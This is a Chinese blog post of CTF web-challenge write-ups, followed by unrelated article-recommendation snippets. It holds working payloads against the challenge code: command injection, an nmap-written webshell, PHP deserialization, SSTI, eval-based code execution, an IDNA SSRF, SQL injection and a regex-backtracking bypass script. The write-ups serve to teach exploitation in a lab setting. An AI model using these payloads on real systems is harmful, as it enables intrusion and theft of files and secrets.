刷题记录（持续更新

BUUCTF 2018 online Tools

考点有两个：nmap写入文件和escapeshellarg()+escapeshellcmd()两个函数的配合。
打开题目，看到代码：

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

上面的xff别管，关键是下面的host参数的处理。可以看到，有直接的命令执行函数，但经过测试发现|和&都是没有用的。看到nmap可以想到-oG参数写入文件。
再看escapeshellarg()和escapeshellcmd()。百度一下，escapeshellarg的作用是给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，escapreshellcmd的作用是：对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义
先看看效果：

再看看在shell执行的结果

可以看到并没有执行成功
再看看题解的结果

运行结果如下：

为什么呢？因为第一个没有加单引号的payload，由于没有单引号，所以在payload的两边加上了单引号，再通过escapeshellcmd()加上转义字符，最后运行结果相当于' -oG a.php'。
而第二个的运行结果被分成了好几部分，相当于运行的结果如下：\ -oG a.php \\（单引号之间看作一部分，空格隔开又算一部分，转义字符\\相当于\），所以nmap才会这样一部分一部分地报错，而且由于nmap看懂了-oG参数，所以这部分没有报错。
a.php文件如下：

最后用蚁剑连上即可得到flag：

payload:' -oG a.php '
参考文章：https://paper.seebug.org/164/#_2
https://blog.csdn.net/qq_26406447/article/details/100711933

ACTF 2020新生赛 include

php伪协议，payload:file=php://filter/read=convert.base64-encode/resource=flag.php。

ZJCTF 2019 NiZhuanSiWei

点进去，代码如下：

   
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "
".file_get_contents($text,'r')."
";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?> 

首先看到$text的值要为welcome to the zjctf，php伪协议即可。$file不能直接读取flag.php文件，但可以看到提示我们读取useless.php文件，

得到代码如下：

  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "
";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?> 

很明显，用$password反序列化和php伪协议读取flag.php文件。
payload如下：

?text=php://input&file=php://filter/read=convert.base64-encode/resource=useless.php&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;}，同时post数据：welcome to the zjctf
base64解码即可得到flag。

ACTF 2020新生赛 Exec

利用管道符执行命令，用0|ls ../../../../../../../../可以看到根目录有flag再用cat读取即可
payload:0|cat ../../../../../../../../flag

SUCTF 2019 Pythonginx

打开就发现有python代码，如下：

@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"

urlparse()是用来分割url的，通过if判断可以知道前两次要host不为suctf.cc，最后一次却要求host为suctf.cc。
最后一个return很明确，会读取经过过滤的URL的文件了，不过没有对协议进行限制，所以我们可以用file协议读取文件。而且很显然需要绕过对host的检查，但我试了很多绕过url的办法都没有成功，后来才知道是关于一个CVE的：urlsplit不处理NFKC标准化。

关键在于这条语句：newhost.append(h.encode('idna').decode('utf-8'))
还有下面的finalUrl = urlunsplit(parts).split(' ')[0]
payload在github上:https://github.com/python-hyper/hyperlink/issues/19
我们按照CVE试一试：

可以看到，由idna编码转换成utf-8后会发现这里的url改变了。于是我们可以利用这个来绕过第三条if语句：

然后我们利用这个读取nginx的配置文件：

payload如下：file://suctf.c℅pt/../../../usr/local/nginx/conf/nginx.conf
可以看到有/usr/fffffflag
读取即可得到flag。

BJDCTF 2020 Easy MD5

进去试了试啥都没有，发现会有重定向，没有源码泄露。于是抓包送入repeater发现在header里有一个hint。

md5函数的作用如下：

我们首先要了解啥是16位原始二进制格式的字符串，我们可以把它理解成下图的效果：

也就是说，这个函数进行MD5函数的参数为true时，得到的md5字符串会被当成16进制来执行。我们可以构造一个字符串，让它的md5开头为276F7227，（因为276F7227经过16进制解码后即为'or'就是万能密码）。
字符串ffifdyop恰好就是这样的，它的md5加密就是276F722736C95D99E921722CF9ED621C，解码后就是上图的ASCII码。
然后可以得到一个hint：

$a = $GET['a'];
$b = $_GET['b'];

if($a != $b && md5($a) == md5($b)){
    // wow, glzjin wants a girl friend.

MD5弱类型比较，数组绕过即可。
payload:?a[]=a&b[]=b
又得到一串源码：

 
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
} 

MD5强碰撞，写过很多次，具体可以看https://www.cnblogs.com/kuaile1314/p/11968108.html
payload:param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2¶m2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
参考文章：https://blog.csdn.net/March97/article/details/81222922

CISCN 2019 华北赛区 Day1 Dropbox（未完成）

点进去，注册admin，登陆，发现界面：

上传图片文件后，发现没有返回存储目录。于是尝试下载，发现了任意文件读取：

试过了读取flag.php和flag.txt后发现并没有找到flag，可以猜测flag在根目录。download.php里有这么一句话：ini_set("open_basedir", getcwd() . ":/etc:/tmp");设置了只有当前工作目录及/etc、/tmp可以被fopen等函数打开。所以肯定不能用download.php来读取。
delete.php关键代码如下：

include "class.php";

chdir($_SESSION['sandbox']);
$file = new File();//创建对象class.php中的File
$filename = (string) $_POST['filename'];
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();//利用点
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

class.php的部分代码如下：

$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);

class User {
    public $db;

    public function __construct() {
        global $db;
        $this->db = $db;
    }
    
    public function __destruct() {
        $this->db->close();
    }
}

class FileList {
    private $files;
    private $results;
    private $funcs;

    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);

        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);

        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }

    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public function __destruct() {
        $table = '
';$table.='';foreach($this->funcsas$func){$table.='';}$table.='';$table.='';foreach($this->resultsas$filename=>$result){$table.='';foreach($resultas$func=>$value){$table.='';}$table.='';$table.='';}echo$table;}}classFile{public$filename;publicfunctionopen($filename){$this->filename=$filename;if(file_exists($filename)&&!is_dir($filename)){returntrue;}else{returnfalse;}}publicfunctionname(){returnbasename($this->filename);}publicfunctionsize(){$size=filesize($this->filename);$units=array(' B',' KB',' MB',' GB',' TB');for($i=0;$size>=1024&&$i<4;$i++)$size/=1024;returnround($size,2).$units[$i];}publicfunctiondetele(){unlink($this->filename);}publicfunctionclose(){returnfile_get_contents($this->filename);}}?>
题目提示我们phar，加上很多魔术函数，可以确定是利用phar反序列化漏洞。在File类的close函数有file_get_content()，而且在User类的魔术函数中调用了，我们可以利用一下。
网鼎杯 2018 unfinish（未完成）
打开页面，发现先让我们登陆，
 
 试试register.php，发现可以注册，
 
 于是注册邮箱为[email protected]用户名为admin，密码为123，登陆后发现啥都没有，但可以看到用户名，猜测有二次注入。
 
 于是回到register.php页面，在用户名处测试payload：0'+(select hex(hex(database())))+'0，注册成功（注册成功会302跳转，失败则返回200），发现成功注入
 
 得到database为web，要用两次hex的原因如下：
 
 因为如果hex一边后的字符有字母的话，与0相加只会显示开始的数字，遇到字母就不显示了。但还有一个问题，就是两次hex之后会变得很长，这样它就会用科学计数法表示，效果如下：
 
 这样我们就无法解码hex。我们采取的办法是进行切割再相加，每10个字符进行一次切割再与0相加，然后利用from for语法即可得到全部信息。
[网鼎杯 2020 青龙组]AreUSerialz
点进去后就是一串源码：


include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: 
";
        echo $s;
    }
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}
经典反序列化漏洞，大致方向就是通过$op=2来触发read函数，再将$filename通过php伪协议读取文件即可。但有两个问题，一个是__destruct的强类型比较：
 
 这个倒是挺好绕过的，因为"2"在PHP中会将其当作字符串进行处理，在process处比较时确实用的弱类型比较。我们令$op=2即可成功绕过。
 下一个是比较难绕的：protected。在该类里，$op，$filename，$content都是protected，protected的变量进行编码后会带%00，不能通过is_valid函数的检查。
比较简单的绕法是：php7.1+版本对属性类型不敏感，本地序列化的时候将属性改为public进行绕过即可。因为在PHP7.1版本的process_nested_data函数中，对于属性没有进行特别的处理，最终导致的绕过。
 payload:?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;i:2;s:8:%22filename%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;s:7:%22content%22;N;}
[BJDCTF2020]Mark loves cat
首先git源码泄露获取源码：
 得到关键代如下：

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;
}

foreach($_GET as $x => $y){
    $$x = $$y;
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){//GET传输的flag参数必须等于flag
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){//POST和GET里都必须有一个flag参数
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){//GET或POST的flag参数不能为flag
    exit($is);
}

echo "the flag is: ".$flag;
?>
分析代码：
 forsearch：
 post传参和get传参的参数键名和值
 关键在于这个$$x = $y和$$x=$$y
 如果我们GET参数传递yds=flag，则相当于$yds=$flag。
 此时我们只要将$yds带出来即可，而恰好有一条语句可以带出来：
 
 也就是说，只要POST的flag不为’flag’（或者直接不传入flag参数）即可得到flag
 payload：?yds=flag
 （这题我还以为是要让三个条件全部通过才能得到flag，没想到是通过其他变量直接带出来，难顶）
[WesternCTF2018]shrine
源码如下：
import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)
SSTI，过滤了(、)、config、self，但flag需要通过config[‘FLAG’]来读取。
 如果没有过滤config，则可以直接用{{config}}。
 如果没有过滤self，则可以用self.__dict__。
 如果小括号没有过滤，则payload可以是这样：
().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']("os").__dict__.environ['FLAG']
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__'.("os").__dict__.environ['FLAG']
## 作者给的;  里本身就有 OS
[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ['FLAG']
但小括号也被过滤了，所以只能换一种方式了。
因为这里过滤了config,self和self，所以要访问到config,所以首先得找到全局变量current_app。
 能跑出x.__globals__的函数有这么几个：
url_for
g
request
namespace
lipsum
range
session
dict
get_flashed_messages
cycler
joiner
config
其中url_for和get_flashed_messages这两个方法的__globals__中，均有current_app，那么获得current_app以后就可以直接访问config。
 
 current_app。
 
 flag
 payload：
 url_for.__globals__['current_app'].config或get_flashed_messages.__globals__['current_app'].config
 参考文章：https://www.cnblogs.com/tr1ple/p/9415641.html
[BJDCTF2020]Cookie is so stable
在flag.php处注册后，在cookie处有SSTI：
 
 而且看到是PHP语言。
 payload：{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat%20/flag")}}
 这个payload的具体解释可以看这篇文章
[CISCN 2019 初赛]Love Math
代码审计：

error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
} 
函数是白名单过滤，字符是黑名单过滤。
 之前有一题我们提到了一个PHP的特性：$a=phpinfo;$a();等同于。
 还有一个重要的函数没有过滤：base_convert()，用法如下：
 
 写个小例子：
 
 图中的36进制是因为10数字+26字母，即为36进制，通过这样的方法来构造字母和数字。
 构造的payload如下：
 ?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){2})
 $pi=base_convert是为了减少长度（这里我们使用的是函数名最短的那个，其他字母会被白名单过滤），30进制同理（因为t为第20个字母，所以后面的几个字母用不上就没必要了）。这条语句等同于exec(getallheaders(){2})（可以把里面的getallheaders直接换成想要执行的命令，一样的），这个2就是headers的参数，结果如图：
 
 也可以通过异或进行处理，获取字符，这里我贴一个大佬的脚本：

$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <=9;$j++){
            $exp = $payload[$k] ^ $i.$j;
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "
";
        }
    }
}
?>
用来爆破字符，得到想要的payload。
BJDCTF 2020 ZJCTF，不过如此
进去先代码审计：


error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "
".file_get_contents($text,'r')."
";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php    
}
else{
    highlight_file(__FILE__);
}
?>
利用php伪协议让$text的内容为I have a dream，然后再用php伪协议读取next.php文件。
 payload:?text=php://input&file=php://filter/read%3dconvert.base64-encode/resource%3dnext.php同时POSTI have a dream得到一串base64，解码得到next.php文件内容：

$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
	@eval($_GET['cmd']);
}
?>
在preg_repalce处的/ie模式存在远程代码执行（具体可查看这篇文章），利用getflag函数得到flag。
 payload:?\S*=${getflag()}&cmd=show_source(%22/flag%22);。
[FBCTF2019] RCEService
源码如下：


putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];
  if (!is_string($json)) {
    echo 'Hacking attempt detected

';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected

';
  } else {
    echo 'Attempting to run command:
';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '

';
  }
}
?>
第一种办法：看看P牛的一篇文章利用这个回溯可以绕过限制。
 我们再看到putenv('PATH=/home/rceservice/jail');
 Linux命令的位置：/bin,/usr/bin，默认都是全体用户使用，/sbin,/usr/sbin,默认root用户使用
 于是我们可以构造payload：
# -*- coding: utf-8 -*-
import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://3f094322-19e3-48c2-806d-fc71bc9a5f70.node3.buuoj.cn/", data={"cmd":payload})
print(res.text)
然后即可得到flag。

                    

                        
                        

                            
 
                        
                        
                        

                            

                        
                        
                        

                            

                        
                    
                

        
你可能感兴趣的:(初窥CTF)
        

            

                

                    
《投行人生》读书笔记
                        小蘑菇的树洞

                        
《投行人生》----作者詹姆斯-A-朗德摩根斯坦利副主席40年的职业洞见-很短小精悍的篇幅，比较适合初入职场的新人。第一部分成功的职业生涯需要规划1.情商归为适应能力分享与协作同理心适应能力，更多的是自我意识，你有能力识别自己的情并分辨这些情绪如何影响你的思想和行为。2.对于初入职场的人的建议，细节，截止日期和数据很重要截止日期，一种有效的方法是请老板为你所有的任务进行优先级排序。和老板喝咖啡的好
                    
                    
本周第二次约练
                        2cfbdfe28a51

                        
中原焦点团队中24初26刘霞2021.12.3约练161次，分享第368天当事人虽然是带着问题来的，但是咨询过程中发现，她是经过自己不断地调整和努力才走到现在的，看到当事人的不容易，找到例外，发现资源，力量感也就随之而来。增强画面感，或者说重温，会给当事人带来更深刻的感受。
                    
                    
ARM驱动学习之4小结
                        JT灬新一
嵌入式C++arm开发学习linux
                        
ARM驱动学习之4小结#include#include#include#include#include#defineDEVICE_NAME"hello_ctl123"MODULE_LICENSE("DualBSD/GPL");MODULE_AUTHOR("TOPEET");staticlonghello_ioctl(structfile*file,unsignedintcmd,unsignedlo
                    
                    
多子女家庭问题
                        3e5c5362403c

                        
杨宁宁焦点解决网络初17中19坚持分享589天（2021.3.20）本周约练我1次，总计166次，读书打卡第256天案例督导收获：【家有老大篇】被爱与高期待下的独舞家里的第一个孩子往往集万千宠爱于一身。爸爸妈妈、爷爷奶奶、姥姥姥爷的目光都聚焦在他的身上。在这种光环下长大的孩子，就如小皇帝一般，衣来伸手、饭来张口。拥有爱的同时，也意味着拥有了更高的被期待，父母会花血本给你报各种各样的早教班，给你买各
                    
                    
2021年2月21日 1000天演讲打卡第52天 乒乓球
                        巅峰_时刻

                        
哈喽大家好，我是嘟嘟，今天是2021年2月21日，也是我1000天演讲打卡第52天，今天我要与大家探讨的主题关于乒乓球。乒乓球，是我目前和小伙伴们最喜欢的一项运动，记得第一次打乒乓球的时候，还是4年前与姥姥娱乐，当时姥姥姥爷来深圳了，这边没有朋友，所以他们每天都会去打乒乓球，有一次我初于好奇心，找他们打了几局，打完下来我大汗淋漓，可心中觉得乒乓球比篮球好多了，也是从那是开始，我要求与姥姥姥爷一起打
                    
                    
现代汉语粗糙版 文学史与经典
                        学习搬运工

                        
第十六章文学史与经典文学史的兴起在西方,虽然从亚里士多德开始,在人类的著述中已经可以找到文学史概念与写作方式的萌芽,但是,人们一般认为17世纪后期到18世纪是现代文学史写作真正开始的时期。长达百年波及整个欧洲的“古今之争”孕育出文学研究的历史意识,现代意义上的文学史观念在这场影响深远的论争中初见端倪。从18世纪晚期到19世纪初,由于席勒、弗·施莱格尔和赫尔德等人的介入,文学史研究逐渐变得复杂和成熟
                    
                    
react-intl——react国际化使用方案
                        苹果酱0567
面试题汇总与解析java开发语言中间件springboot后端
                        
国际化介绍i18n：internationalization国家化简称，首字母+首尾字母间隔的字母个数+尾字母，类似的还有k8s(Kubernetes)React-intl是React中最受欢迎的库。使用步骤安装#usenpmnpminstallreact-intl-D#useyarn项目入口文件配置//index.tsximportReactfrom"react";importReactDOMf
                    
                    
一个纯真姑娘被现实社会磨灭了热情
                        幽律

                        
每个初入社会的人，都是满怀憧憬，热情对待这个社会，可往往都是被回馈以欺骗，恐吓，磨灭了热情。我的一个朋友，小吴，来自安徽的姑娘，初出校门，来到这座南方经济发达的城市，善良单纯，待人对事充满了朝气与热情。当时小吴所在的房产中介公司有一位女客户，是退休教师，谈吐方面能感觉得到很有素质，和她先生想要买房，小吴接待的。了解情况后，客户感觉经济方面还是有点压力的，所以委托小吴先帮她卖自己的旧房，周转开来再买
                    
                    
第二十五辑-安尘乱物
                        wallowed

                        
1、《劳犁》作犁耕土解炎林，劳碌秋丰四两金。挥汗佝偻衣褴褛，卖得如洗衬寒贫。春种南山锄造力，傍老倚仗体民心。颗籽无收黍稷尘，农田饥劬苦疫病。牛羊冷炙食蚕桑，丁壮耒耜宿闲勤。归来未已开红豆，篱落花稀麦苗青。米贵征徭生柴火，荒草凄清渐鸡鸣。谷雨时节方期许，择日又是复曾经。2、《忘言》久别似相识，对酒客长安。嘘唏一仗夜，临行却忘言。江雪空投岸，梨花淡云烟。若问有缘人，相窥两不厌。莫作酒魂归，窗台结生寒。
                    
                    
Linux CTF逆向入门
                        蚁景网络安全
linux运维CTF
                        
1.ELF格式我们先来看看ELF文件头，如果想详细了解，可以查看ELF的manpage文档。关于ELF更详细的说明：e_shoff：节头表的文件偏移量（字节）。如果文件没有节头表，则此成员值为零。sh_offset：表示了该section（节）离开文件头部位置的距离+-------------------+|ELFheader|---++--------->+-------------------
                    
                    
炒币好还是挖矿好？
                        区块链大社会

                        
炒币好还是挖矿好？相信这个问题对于很多初入行的朋友来说是个不小的问题，小编也经常会被问到类似问题。为此，本文专门针对这个问题做一下分析，供各位朋友们参考。在比特币世界里，有些非常有意思的比喻，像挖金子一样“挖”比特币叫做“挖矿”，挖比特币的人被称为“矿工”，而用于“挖”比特币的电脑被称为“矿机”。而“炒币”就像炒股，直接在交易平台购买数字货币进行交易，不需要“挖”，只要将法币兑换成某种数字货币，再
                    
                    
晨间日记
                        时光分拣机

                        
一日一诗赠别（一）唐-杜牧娉娉袅袅十三余，豆蔻梢头二月初。春风十里扬州路，卷上珠帘总不如。https://mp.weixin.qq.com/s/DRQzfcPvFkcGBBOR06PbEw图片发自App
                    
                    
2021-01-06
                        如鱼饮水2020

                        
中原焦点团队网络初23期坚持分享第186天，约练第36场，本周4，咨14（20210106）生物钟自然醒，一看有个九点的约练，只有半小时，风一样解决起床、早餐、买菜日常必修课。准点进入约练房间。聊点什么呢，还是聊点自己内心抵触当来访者的话题，想看看两位老师会怎样帮忙梳理，不想当来访者的来访者。诉说自己从小父母宠爱，老公溺宠，不知天高地厚，也不知人情世故，更不知道察言观色，一直活在自己的世界里。被宠
                    
                    
服了我的一根筋
                        公木白

                        
以前朋友说我一根筋，还有的说我是棒槌，实心眼的，听了我呵呵一笑，照常行事。年龄越大，越苦恼于我的一根筋，在我的思维模式里，所有的事情都是直线，点对点，没有曲折，没有迂回，对事的态度非黑及白，没有灰色地带。如果想好了一件事，脑子里只有这一件事，或者说遇事想好了解决办法，即使在执行过程中有更好的，也会自动忽略，还一直初在原定思维里。这种情况不只发生一两次，遇事不知变通，也不知道拐弯，总是过后才发觉本可
                    
                    
Windows安装ciphey编码工具，附一道ciscn编码题例
                        im-Miclelson
CTF工具网络安全
                        
TA是什么一款智能化的编码分析解码工具，对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位（最新的版本不兼容，32位的也不行）PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件，r修改成rb即可。使用标准语
                    
                    
2005年高考英语北京卷 - 阅读理解C
                        让文字更美

                        
Howcouldwepossiblythinkthatkeepinganimalsincagesinunnaturalenvironments-mostlyforentertainmentpurposes-isfairandrespectful?我们怎么可能认为把动物关在非自然环境的笼子里——主要是为了娱乐目的——是公平和尊重的呢？Zooofficialssaytheyareconcernedab
                    
                    
做有良心的教育——读《怎样教语文》今日所感
                        瑾言_lw999

                        
“精彩的课堂教学应该是展示一个过程，而不是展示一个结果。”初读之时，没有太多感触；反复嚼读，心中波澜起伏。脑中突然冒出“”做有良心的教育”这一想法来，我又是否做到了有良心的教育呢？课堂之上，某个同学回答不出问题，我耐心地引导他了吗？教学效果不好之时，我深刻地反省自己了吗？学生的冲突与矛盾，我又是否打开了他们的心结？让他们不再有怨恨呢？我是教学生有了好的成绩还是培养了他的能力呢？诸多问题，一时涌现在
                    
                    
我们毕业分别四十年！
                        关东老叟

                        
我们毕业分别四十年了，时光茬冉，我们都成了爷爷、奶奶。还记得我们初入学时住校的那栋楼吗？还记得“摇橹扬帆过走廊“吗？还记得”校长的妹妹——路滑“吗？我们相识在那栋楼里，宿舍虽然简陋，但我们对门住着，就像温馨的大家庭。还记得食堂吃饭的情景吗？一下课我们都匆匆去食堂，拿着吃饭的小盆，手里捏着饭票，排队等待给我们打饭。老师讲课的场面也许没有记住多少，但我们还是学到了许多知识。课余操场上我们打过羽毛球，踢
                    
                    
韩愈《题榴花》：倾听花落的声音
                        墙头草说

                        
无论有没有人欣赏，时节一到，花儿自然就会开放，这是自然的规律。但是多情的人们总以为花儿是为自己而开，于是在赏花之时，或惊叹于造化之功，或沉醉于迷人花香，或伤悼于满地落红……唐代诗人韩愈在观赏石榴花时，也生发出深沉的感慨，于是写下了《题榴花》一诗，原文如下：五月榴花照眼明，枝间时见子初成。可怜此地无车马，颠倒青苔落绛英。“五月榴花照眼明”，五月如火的石榴花映入眼帘格外鲜明。五月份，正是石榴花开得正盛
                    
                    
陈悦 | 科学学的起源及其发展
                        斐夷所非
sciencehistory科学学
                        
作者|陈悦20世纪初，随着科学技术的迅猛发展和科学社会学的兴起，科学学逐渐得到关注和研究。经过百年的发展，科学学正成为一门重要的交叉学科，对科技发展和社会进步产生了深远影响。面对百年未有之大变局加速演进，尤其是世界各国都把目光聚焦于科技，希望通过科技创新找到适应变局的出路时，科学学更凸显其必要性。因此，《世界科学》杂志开设“科学学探索”栏目。一方面，促进更多的人加入科学学的研究和讨论中，深入探讨科
                    
                    
2023-10-26
                        Eltonpeople

                        
